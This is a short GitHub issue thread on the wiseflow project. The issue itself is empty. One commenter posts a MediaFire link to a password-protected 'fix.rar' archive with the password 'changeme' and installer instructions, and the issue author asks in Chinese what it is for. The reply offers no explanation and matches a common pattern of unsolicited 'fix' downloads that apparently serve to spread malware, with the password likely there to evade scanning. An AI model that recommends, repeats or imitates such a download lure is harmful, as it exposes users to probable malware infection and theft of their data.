### ISSUE TITLE
400question

### ISSUE THREAD

**Issue by ccxxiicc** [TeamWiseFlow/wiseflow#78]

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ccxxiicc** [comment]
> 下载 https://www.mediafire.com/file/czdodbba054p738/fix.rar/file 密码：changeme 在安装程序菜单中，选择“gcc”。

这是用来做什么的？
